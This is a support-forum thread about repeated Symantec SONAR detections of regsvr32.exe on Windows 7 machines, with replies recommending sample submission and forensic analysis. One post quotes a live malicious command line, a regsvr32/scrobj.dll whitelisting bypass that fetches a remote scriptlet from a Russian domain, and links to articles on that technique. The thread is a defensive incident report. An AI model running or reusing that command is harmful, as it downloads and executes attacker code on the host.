Endpoint Protection

 View Only

  • 1.  SONAR.SuspLaunch!g24 Virus

    Posted Aug 20, 2018 05:29 AM

    Hello Team,

     

    We are continuosly seeing the alerts related to Downloader Dromedan attack activity blocked and the culprit service is regsvr32.exe which falls under the category of SONAR.SuspLaunch!g24 as reported by Symantec. Please assist so as to what steps should be followed:

     

    Windows 7 Professional Edition SONAR.SuspLaunch!g24
    Security Risk    		 1 08/20/2018 09:16:43 Default
         		 c:\windows\system32\regsvr32.exe SHA-256
    890c1734ed1ef6b2 422a9b21d6205cf9 1e014add8a7f41aa 5a294fcf60631a7b

     

     

    08/18/2018 09:04:40 Active Response disengaged     Windows 7 Enterprise Edition   Info and above  
    Other    		       Default 1
    08/18/2018 08:55:40 Intrusion Prevention     Windows 7 Enterprise Edition   Critical Inbound       Default 1
    08/18/2018 08:54:45 Active Response     Windows 7 Enterprise Edition   Major and above Inbound       Default 1


  • 2.  RE: SONAR.SuspLaunch!g24 Virus

    Posted Aug 20, 2018 11:41 AM

    Are you under the impression this is a false positive? I would submit to Symantec so they can review this.



  • 3.  RE: SONAR.SuspLaunch!g24 Virus

    Posted Aug 20, 2018 10:34 PM

    Hello Brian,

     

    Thanks for the response. I submitted the sample and as per Symantec, the file regsvr32.exe is clean. I went through many articles online(https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-regsvr32-exe/)(https://labs.mwrinfosecurity.com/blog/dll-tricks-with-vba-to-improve-offensive-macro-capability/) and found that there is some registry entry created in the system by which regsvr32 tries to register a dll and then attempts to connect to a malicious URL which is blocked by SEP.

    The registry entry created is regsvr32.exe /s /n /u http://server2.aserdefa.ru/restore.xml scrobj.dll.

    I want analysis and clue from where this entry got created in registry and why only scrobj.dll was selected by regsvr32.exe to connect to the malicious domain.

    Can you help please.

     

    Thanks,

     

     



  • 4.  RE: SONAR.SuspLaunch!g24 Virus

    Posted Aug 21, 2018 03:20 AM

    You'd need the initial dropper or malicious file that created it to analyze.



  • 5.  RE: SONAR.SuspLaunch!g24 Virus

    Posted Aug 21, 2018 06:45 AM

    Can we check somehow which was the dropper file and is the file still present on system.



  • 6.  RE: SONAR.SuspLaunch!g24 Virus

    Posted Aug 21, 2018 06:51 AM

    Tough to say. You'll want to run a full fornensic analysis on the system and try to correlate it with logs from your network devices such as your firewall/IPS to see how it got in. Ideally, if you  had file integrity monitoring enabled for the system it would make it easier.



  • 7.  RE: SONAR.SuspLaunch!g24 Virus

    Posted Jan 17, 2019 03:40 PM

    The problem persists and the symantec team has not taken the task of solving the problem